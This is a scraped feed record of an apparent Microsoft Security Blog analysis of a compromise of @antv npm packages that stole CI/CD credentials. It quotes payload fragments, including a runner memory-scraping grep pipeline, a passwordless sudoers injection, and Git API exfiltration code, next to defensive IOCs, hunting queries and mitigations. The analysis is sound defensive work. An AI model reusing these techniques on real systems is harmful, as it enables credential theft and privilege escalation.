{“lastseen”:”2026-05-20T19:28:40″,”description”:”Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. A threat actor compromised an _@antv_ maintainer account and published malicious versions of widely used data-visualization packages, resulting in cascading downstream impact.\\n\\nThe compromise propagated through dependency chains into libraries like _echarts-for-react_(which has more than 1 million weekly downloads), expanding the blast radius into CI\/CD pipelines and cloud workloads across the ecosystem. The malicious payload\u2014a ~499 KB obfuscated JavaScript file\u2014runs silently during npm install and is purpose-built to steal credentials from GitHub Actions environments.\\n\\nKey capabilities observed in the payload include multi-platform credential theft (GitHub, Amazon Web Services, HashiCorp Vault, npm, Kubernetes, 1Password), GitHub Action Runner process memory scraping, privilege escalation, dual-channel data exfiltration, and Supply chain Levels for Software Artifacts (SLSA) provenance forgery. These capabilities suggest a deliberate effort to evade analysis and an apparent focus on CI\/CD environments.\\n\\nThe authors of the antv account have also since confirmed in a ticket on the repo that the situation is now resolved.\\n\\n## Attack chain overview\\n\\nFigure 1. @antv npm supply chain attack flow.\\n\\nThe _@antv_ organization maintains charting libraries (G2, G6) embedded across dashboards and applications. The attack proceeds through:\\n\\n * Maintainer account compromise and publication of malicious _@antv_ package versions\\n * Downstream dependency amplification (_echarts-for-react_ , _size-sensor_ , and others)\\n * Automatic payload execution through a preinstall hook during npm install\\n * Execution chain: node \u2192 shell \u2192 bun \u2192 payload (Bun runtime installed if absent)\\n\\n\\n\\n### Technical analysis\\n\\nThe payload replaces the legitimate index.js with a single-line obfuscated script.\\n\\n#### Obfuscation\\n\\n * **Layer 1:** 1,732 Base64-encoded strings in a rotated array, decoded through lookup function with the shuffle key 0xa31de\\n * **Layer 2:** Critical strings such as command-and-control (C2) domain and env var names are encrypted with a custom PBKDF2 and SHA-256 cipher, which is decrypted at runtime.\\n * **Environment gating:** The payload exits immediately if it\u2019s not running on GitHub Actions on Linux\\n * **Branch avoidance:** Skips the _main_ , _master_ , _dependabot\/_ , _renovate\/_ , and _gh-pages_ when using Git API exfiltration\\n\\n\\n \\n \\n \/\/ Layer 1: 1,732 strings in rotated array with base64 decode\\n (function(_0x44be0e, _0x3ff020){\\n \/\/ Array shuffle IIFE with key 0xa31de\\n _0x335af4[‘push’](_0x335af4[‘shift’]());\\n })(_0x71ec, 0xa31de));\\n \\n \/\/ Layer 2: PBKDF2+SHA256 runtime decryption for critical strings\\n var e6 = \\”a8269c01069452afb8a54de904e6419578d155fdbdb9e566bab8576a4266b61e\\”;\\n var t6 = \\”7f44e4ba6f6a71bd0f789e7f83bd3104\\”;\\n var u5 = new du(e6, t6); \/\/ PBKDF2 cipher instance\\n globalThis[\\”f2959c600\\”] = function(s) { return u5.decode(s); };\\n \\n \/\/ Environment gate – exits if not GitHub Actions on Linux\\n this[‘isGitHubActions’] = process.env[f2959c600(’68zz23c6NGR9…’)] === ‘true’;\\n this[‘isLinuxRunner’] = process.env[f2959c600(‘NhUrwwYEwYIJ…’)] === ‘Linux’;\\n \\n\\n#### Credential theft\\n\\nThe payload targets secrets across six platforms:\\n\\n * **GitHub** : Extracts _GITHUB_TOKEN_ , scans for Personal Access Tokens (_gh[op]__) and installation tokens (_ghs__), validates through _\/user_ API, and enumerates repo and org secrets.\\n * **Amazon Web Services(AWS)** : Queries Instance Metadata Service (169.254.169[.]254), Elastic Container Service metadata (169.254.170[.]2), reads _.aws\/_ files, harvests env vars, and then calls SecretsManager across all regions.\\n * **HashiCorp Vault** : Searches 12+ token paths (_\/var\/run\/secrets\/vault\/token_ , _~\/.vault-token_ , and others) and connects to a local Vault at 127.0.0[.]1:8200.\\n * **npm** : Validates tokens using _\/-\/whoami_ , exchanges OpenID Connect (OIDC) tokens for publish access, and enumerates packages\\n * **Kubernetes** : Reads service account tokens and enumerates namespace secrets\\n * **1Password** : Interacts with command-line interface (CLI) and attempts master password extraction with two-factor authentication (2FA) bypass\\n\\n\\n \\n \\n \/\/ AWS Secrets Manager enumeration\\n ‘secretsmanager:ListSecrets’\\n ‘secretsmanager:GetSecretValue(‘\\n \\n \/\/ Vault token paths searched (12+ locations)\\n ‘\/var\/run\/secrets\/vault\/token’\\n ‘\/.vault-token’\\n ‘\/home\/runner\/.vault-token’\\n ‘\/root\/.vault-token’\\n ‘\/etc\/vault\/token’\\n \\n \/\/ GitHub API secret enumeration\\n ‘\/actions\/secrets?per_page=100’\\n ‘\/actions\/organization-secrets?per_page=100’\\n \\n\\n#### Runner memory scraping\\n\\nThe payload locates the GitHub Actions Runner.Worker PID using \/proc scanning, then extracts runtime secrets using the following:\\n \\n \\n \/\/ Locates Runner.Worker PID via \/proc\\n ‘findRunnerWorkerPIDLinux’\\n \/\/ Scans \/proc\/\/cmdline for \\”Runner.Worker\\”\\n \\n \/\/ Extracts secrets from process memory\\n tr -d ‘\\\\0’ | grep -aoE ‘\\”[^\\”]+\\”:{\\”value\\”:\\”[^\\”]*\\”,\\”isSecret\\”:true}’ | sort -u\\n \\n\\nThis activity bypasses normal secret masking by reading secrets directly from runner process memory.\\n\\n#### Privilege escalation\\n\\n * Injects sudoers rule through bind mount: _echo ‘runner ALL=(ALL) NOPASSWD:ALL’ \\u003e \/mnt\/runner_\\n * Modifies _\/etc\/hosts_ for DNS redirection\\n\\n\\n \\n \\n \/\/ Injects passwordless sudo via \/etc\/sudoers.d bind mount at \/mnt\\n echo ‘runner ALL=(ALL) NOPASSWD:ALL’ \\u003e \\n \\u0026\\u0026 chmod 0440 \/mnt\/runner\\n \\n \/\/ DNS manipulation\\n sudo sh -c \\”echo ‘127.0.0.1 ‘ \\u003e\\u003e \/etc\/hosts\\”\\n \\n \/\/ Validates sudo access before operations\\n sudo -n true\\n \\n\\n#### Exfiltration\\n\\nDual-channel exfiltration:\\n\\n * **Primary:** HTTPS to encrypted C2 domain (port 443) with DNS pre-check and health probe\\n * **Fallback:** Git Data API \u2014 Creates blobs, trees, or commits in victim repositories on non-protected branches\\n * **Tertiary:** Creates public repos under victim accounts with reversed description (\\”niagA oG eW ereH :duluH-iahS\\”); more than 2,200 of these repos have been observed as of this writing\\n\\n\\n \\n \\n \/\/ Primary: HTTPS C2 with encrypted domain (port 443)\\n let config = {\\n ‘domain’: f2959c600(‘bXVunP4+izfR\/cOx8zhW\/fw8v6xFc4cvjYgGdbEE’),\\n ‘port’: 0x1bb, \/\/ 443\\n ‘path’: f2959c600(‘5WA4NOQUD\/n\/mNx\/cqL4gSVQrTrwV+RBKO7TXeTIk3fFBUt+2arGDjc=’),\\n ‘dry_run’: false\\n };\\n \\n \/\/ Fallback: Git Data API – creates blobs\/trees\/commits in victim repos\\n await j(token, ‘\/repos\/’ + owner + ‘\/’ + repo + ‘\/git\/blobs’,\\n {‘method’: ‘POST’, ‘body’: JSON.stringify(stolen_data)});\\n ‘\/git\/trees’\\n ‘\/git\/commits’\\n \\n \/\/ Branch filter – avoids protected branches to evade detection\\n Dw = [‘dependabot\/’, ‘renovate\/’, ‘gh-pages’, ‘docs\/’,\\n ‘copilot\/’, ‘master’, ‘main’];\\n \\n\\n#### Propagation and persistence\\n\\n * Enumerates _\/user\/repos_ and _\/user\/orgs_ to spread into additional repositories\\n * Installs Bun runtime, executes second-stage payload using _bun run .claude\/_\\n * Deploys token monitor for ongoing credential capture\\n * Forges SLSA provenance attestations through Sigstore (Fulcio or Rekor) to appear legitimate\\n\\n\\n\\n#### Impact and blast radius\\n\\n * Direct compromise of _@antv_ packages with broad ecosystem adoption\\n * Amplification through downstream dependencies into thousands of projects\\n * Cascading risk: stolen npm tokens enable further package poisoning, stolen GitHub tokens enable repo manipulation, and stolen AWS credentials enable cloud access\\n * SLSA provenance forgery erodes trust in supply chain attestation frameworks\\n\\n\\n\\n### **How GitHub took action to prevent further harm******\\n\\nUpon learning of the attack, GitHub acted immediately to limit further damage. It removed 640 malicious packages and invalidated 61,274 npm granular access tokens with write permissions and 2FA bypass, preventing leaked tokens from being used in this or similar attacks. GitHub also published advisories relevant to this malware campaign in the GitHub Advisory Database and alerted the community through Dependabot alerts and npm audit. It continues to monitor for additional affected packages and remove them as needed.\\n\\n## Mitigation and protection guidance\\n\\nMicrosoft recommends the following mitigations to reduce the impact of this threat:\\n\\n * Review dependency trees for direct or transitive usage of affected _@antv\/_ packages.\\n * Identify systems that installed or built affected package versions during the suspected exposure window.\\n * Pin known-good package versions where possible and avoid automatic dependency upgrades until validation is complete.\\n * Disable pre- and post-installation script execution by ensuring you run npm install with `–ignore-scripts`.\\n * While GitHub team has already invalidated all the npm tokens that had write access and 2FA bypass, Microsoft Defender still recommends rotating credentials, tokens, npm access tokens, CI\/CD secrets, and cloud credentials that might have been exposed in affected build or developer environments.\\n * Rotate credentials, tokens, npm access tokens, CI\/CD secrets, and cloud credentials that might have been exposed in affected build or developer environments.\\n * Audit organization and personal GitHub accounts for public repositories with the description \u201cniagA oG eW ereH :duluH-iahS\u201d or other unexpected repositories created during the exposure window, and revoke any GitHub tokens that might have been implicated.\\n * Audit CI\/CD logs for unexpected outbound network connections, script execution, or suspicious package lifecycle activity.\\n * Review npm package lockfiles, build logs, and artifact provenance for evidence of compromised package versions.\\n * Enable cloud-delivered protection in Microsoft Defender Antivirus or equivalent antivirus protection.\\n * Use Microsoft Defender XDR to investigate suspicious activity across endpoints, identities, cloud apps, and developer environments.\\n * Use Microsoft Defender Vulnerability Management to search for antv packages across your estate.\\n\\n\\n\\n### Microsoft Defender XDR Detections\\n\\nMicrosoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic**| **Observed activity**| **Microsoft Defender coverage** \\n—|—|— \\nExecution | Suspicious script execution during npm install or package lifecycle activity| **Microsoft Defender Antivirus** \\n- Trojan:AIGen\/NPMStealer \\n- Backdoor:Python\/ShaiWorm \\n- Trojan:JS\/ShaiWorm \\n- Trojan:JS\/ObfusNpmJs \\n \\n**Microsoft Defender for Endpoint** \\n- Suspicious usage of Bun runtime \\n- Suspicious Installation of Bun runtime \\n- Suspicious _Node.js_ process behavior \\nCredential Access| Potential harvesting of environment variables, tokens, or developer secrets| **Microsoft Defender for Endpoint** \\n- Credential access attempt \\n- Suspicious cloud credential access by npm-cached binary \\n- Kubernetes secrets enumeration indicative of credential access \\n \\n**Microsoft Defender for Cloud** \\nSha1-Hulud Campaign Detected: Possible command injection to exfiltrate credentials \\nCommand and Control| Potential outbound connections from build systems or developer machines| **Microsoft Defender for Endpoint** \\nConnection to a custom network indicator \\n \\n* * *\\n\\n# Microsoft Security Copilot\\n\\nSecurity Copilot customers can use the standalone experience to create their own prompts or run prebuilt promptbooks to automate incident response or investigation tasks related to this threat, including:\\n\\n * Incident investigation\\n * Microsoft user analysis\\n * Threat Intelligence 360 report based on MDTI article\\n * Vulnerability or supply chain impact assessment\\n\\n\\n\\nNote that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.\\n\\n### **Microsoft Defender XDR Threat analytics**\\n\\nhttps:\/\/security.microsoft.com\/threatanalytics3\/5879a0e7-f145-407b-bc84-1ae405a016ea\/overview\\n\\n### Advanced hunting\\n\\nThe following sample queries let you search for a week’s worth of events. To explore up to 30 days of raw data, go to the Advanced Hunting page \\u003e Query tab, and update the time range to Last 30 days.\\n\\n**Hunt for suspicious npm lifecycle script execution**\\n\\nThis query searches for _Node.js_ and npm activity involving install lifecycle behavior and relevant package references.\\n \\n \\n DeviceProcessEvents\\n | where FileName in~ (\\”node.exe\\”, \\”npm.cmd\\”, \\”npm.exe\\”, \\”npx.cmd\\”, \\”npx.exe\\”)\\n | where ProcessCommandLine has_any (\\”preinstall\\”, \\”postinstall\\”, \\”install\\”)\\n | where ProcessCommandLine has_any (\\”@antv\\”, \\”echarts-for-react\\”)\\n | project Timestamp, DeviceName, FileName, ProcessCommandLine,\\n InitiatingProcessFileName, InitiatingProcessCommandLine,\\n AccountName\\n \\n\\n**Hunt for potential compromise of through malicious npm packages**\\n \\n \\n DeviceProcessEvents\\n | where Timestamp \\u003e ago(2d)\\n | where FileName in (\\”bun\\”, \\”bun.exe\\”)\\n | where ProcessCommandLine has \\”run index.js\\”\\n \\n\\n****Hunt for affected dependencies in your software inventory****\\n \\n \\n DeviceTvmSoftwareInventory\\n | where SoftwareName has \\”antv\\” or SoftwareVendor has \\”antv\\”\\n | project DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion\\n \\n\\n**Hunt for suspicious outbound connection from python backdoor**\\n \\n \\n DeviceNetworkEvents\\n | where Timestamp \\u003e ago(2d)\\n | where InitiatingProcessFileName startswith \\”python\\”\\n | where InitiatingProcessCommandLine has \\”\/cat.py\\”\\n \\n\\n**Hunt for suspicious outbound activity from Node.js processes**\\n\\nSearches for network connections initiated by Node.js or npm processes that reference package-related paths or commands.\\n \\n \\n DeviceNetworkEvents\\n | where InitiatingProcessFileName in~ (\\”node.exe\\”, \\”npm.exe\\”, \\”npx.exe\\”)\\n | where InitiatingProcessCommandLine has_any (\\”@antv\\”, \\”echarts-for-react\\”, \\”node_modules\\”)\\n | project Timestamp, DeviceName, RemoteUrl, RemoteIP,\\n InitiatingProcessFileName, InitiatingProcessCommandLine,\\n AccountName\\n \\n\\n**Hunt for affected dependency references in developer directories**\\n\\nThis query searches for package manifest or lockfile activity that might contain relevant dependency references.\\n \\n \\n DeviceFileEvents\\n | where FileName in~ (\\”package.json\\”, \\”package-lock.json\\”, \\”yarn.lock\\”, \\”pnpm-lock.yaml\\”)\\n | where FolderPath has_any (\\”node_modules\\”, \\”src\\”, \\”repo\\”, \\”workspace\\”)\\n | where AdditionalFields has_any (\\”@antv\\”, \\”echarts-for-react\\”)\\n | project Timestamp, DeviceName, FolderPath, FileName,\\n InitiatingProcessFileName, InitiatingProcessCommandLine\\n \\n\\n**Hunt for post-compromise C2 activity**\\n \\n \\n DeviceNetworkEvents\\n | where Timestamp \\u003e ago(2d)\\n | where RemoteUrl has \\”t.m-kosche.com\\”\\n \\n\\n**Shai-Hulud npm supply-chain indicator observed inside a Kubernetes container**\\n \\n \\n CloudProcessEvents\\n | where ProcessCommandLine has_any (\\”IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner\\”, \\”niagA oG eW ereH\\”, \\”:duluH-iahS\\”, \\”t.m-kosche.com\\”, \\”7cb42f57561c321ecb09b4552802ae0ac55b3a7a\\”, \\”@antv\/setup\\”)\\n | project Timestamp, AzureResourceId, KubernetesPodName, KubernetesNamespace, ContainerName, ContainerId, ContainerImageName, ProcessName, ProcessCommandLine, ProcessCurrentWorkingDirectory, ParentProcessName, ProcessId, ParentProcessId, AccountName\\n \\n\\n### Indicators of Compromise (IOC)\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\n@antv \u2013 whole account| Package scope| All packages maintained by the antv account were compromised. \\n \\nAs per the latest statement from the account author\u2019s this situation is now resolved. \\necharts-for-react| Package name| One of the major downstream packages impacted by the antv compromise. \\nAs per the latest statement from the repository author\u2019s this situation is now resolved \\na68dd1e6a6e35ec3771e1f94fe796f55dfe65a2b94560516ff4ac189390dfa1c| SHA-256| Malicious payload JavaScript file \\nfb5c97557230a27460fdab01fafcfabeaa49590bafd5b6ef30501aa9e0a51142| SHA-256| Malicious backdoor Python script \\nt.m-kosche[.]com:443| Domain| Infrastructure associated with campaign \\nIndex.js| File name| Malicious script or dropped file \\ncat.py| File name| Malicious script or dropped file \\n \\n* * *\\n\\n## References\\n\\n * Mini Shai-Hulud Hits @antv Ecosystem, 639 Compromised npm Package Versions\\n\\n\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Rahul Mohandas, Sumith Maniath, Ahmed Saleem Kasmani, Arvind Gowda, Sagar Patil, and members of Microsoft Threat Intelligence._\\n\\n## Learn more\\n\\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.\\n\\nTo get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.\\n\\nTo hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.\\n\\nReview our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization. \\n\\n * How Microsoft discovers and mitigates evolving attacks against AI guardrails \\n * Learn more about securing Copilot Studio agents with Microsoft Defender \\n * Evaluate your AI readiness with our latest Zero Trust for AI workshop.\\n * Learn more about Protect your agents in real-time during runtime (Preview)\\n * Explore how to build and customize agents with Copilot Studio Agent Builder \\n * Microsoft 365 Copilot AI security documentation \\n\\n\\n\\nThe post Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft appeared first on Microsoft Security Blog.”,”published”:”2026-05-20T17:48:44″,”modified”:”2026-05-20T17:48:44″,”type”:”mssecure”,”title”:”Mini Shai Hulud: Compromised @antv npm packages enable CI\/CD credential theft”,”source”:””,”references”:””,”id”:”MSSECURE:6D00E966D9372364C645950D0C2319E5″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/20\/mini-shai-hulud-compromised-antv-npm-packages-enable-ci-cd-credential-theft\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-20T19:28:40″,”description”:”Microsoft has identified an active supply chain attack targeting the _@antv_ node package manager (npm) package ecosystem. A threat actor compromised an _@antv_ maintainer account…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-55895","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n